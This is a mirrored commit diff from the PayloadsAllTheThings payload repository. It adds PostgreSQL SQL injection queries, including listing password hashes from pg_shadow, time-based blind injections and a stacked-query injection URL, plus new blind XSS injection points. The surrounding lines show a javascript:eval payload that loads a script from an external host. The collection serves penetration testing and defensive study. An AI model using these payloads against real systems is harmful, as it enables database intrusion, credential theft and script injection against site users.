mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
Merge pull request #112 from nizam0906/master
Added More PostgreSQL Injection Queries And Blind XSS endpoint
This commit is contained in:
commit
be3ef08d19
@ -3,9 +3,19 @@
|
||||
## Summary
|
||||
|
||||
* [PostgreSQL Comments](#postgresql-comments)
|
||||
* [PostgreSQL version](#postgresql-version)
|
||||
* [PostgreSQL Current User](#postgresql-current-user)
|
||||
* [PostgreSQL List Users](#postgresql-list-users)
|
||||
* [PostgreSQL List Password Hashes](#postgresql-list-password-hashes)
|
||||
* [PostgreSQL List Privileges](#postgresql-list-privileges)
|
||||
* [PostgreSQL database name](#postgresql-database-name)
|
||||
* [PostgreSQL List databases](#postgresql-list-database)
|
||||
* [PostgreSQL List tables](#postgresql-list-tables)
|
||||
* [PostgreSQL List columns](#postgresql-list-columns)
|
||||
* [PostgreSQL Error Based](#postgresql-error-based)
|
||||
* [PostgreSQL Blind](#postgresql-blind)
|
||||
* [PostgreSQL Time Based](#postgresql-time-based)
|
||||
* [PostgreSQL Stacked query](#postgresql-stacked-query)
|
||||
* [PostgreSQL File Read](#postgresql-file-read)
|
||||
* [PostgreSQL File Write](#postgresql-file-write)
|
||||
* [PostgreSQL Command execution](#postgresql-command-execution)
|
||||
@ -20,6 +30,64 @@
|
||||
/**/
|
||||
```
|
||||
|
||||
## PostgreSQL Version
|
||||
|
||||
```sql
|
||||
SELECT version()
|
||||
```
|
||||
|
||||
## PostgreSQL Current User
|
||||
|
||||
```sql
|
||||
SELECT user;
|
||||
SELECT current_user;
|
||||
SELECT session_user;
|
||||
SELECT usename FROM pg_user;
|
||||
SELECT getpgusername();
|
||||
```
|
||||
|
||||
## PostgreSQL List Users
|
||||
|
||||
```sql
|
||||
SELECT usename FROM pg_user
|
||||
```
|
||||
|
||||
## PostgreSQL List Password Hashes
|
||||
|
||||
```sql
|
||||
SELECT usename, passwd FROM pg_shadow
|
||||
```
|
||||
|
||||
## PostgreSQL List Privileges
|
||||
|
||||
```sql
|
||||
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
|
||||
```
|
||||
|
||||
## PostgreSQL Database Name
|
||||
|
||||
```sql
|
||||
SELECT current_database()
|
||||
```
|
||||
|
||||
## PostgreSQL List Database
|
||||
|
||||
```sql
|
||||
SELECT datname FROM pg_database
|
||||
```
|
||||
|
||||
## PostgreSQL List Tables
|
||||
|
||||
```sql
|
||||
SELECT table_name FROM information_schema.tables
|
||||
```
|
||||
|
||||
## PostgreSQL List Columns
|
||||
|
||||
```sql
|
||||
SELECT column_name FROM information_schema.columns WHERE table_name='data_table'
|
||||
```
|
||||
|
||||
## PostgreSQL Error Based
|
||||
|
||||
```sql
|
||||
@ -48,6 +116,14 @@ AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
|
||||
AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
|
||||
```
|
||||
|
||||
## PostgreSQL Stacked Query
|
||||
|
||||
Use a semi-colon ";" to add another query
|
||||
|
||||
```sql
|
||||
http://host/vuln.php?id=injection';create table NotSoSecure (data varchar(200));--
|
||||
```
|
||||
|
||||
## PostgreSQL File Read
|
||||
|
||||
```sql
|
||||
|
@ -416,6 +416,12 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
|
||||
- Referer Header
|
||||
- Custom Site Analytics
|
||||
- Administrative Panel logs
|
||||
- User Agent
|
||||
- Custom Site Analytics
|
||||
- Administrative Panel logs
|
||||
- Comment Box
|
||||
- Administrative Panel
|
||||
|
||||
|
||||
## Polyglot XSS
|
||||
|
||||
|
Loading…
Reference in New Issue
Block a user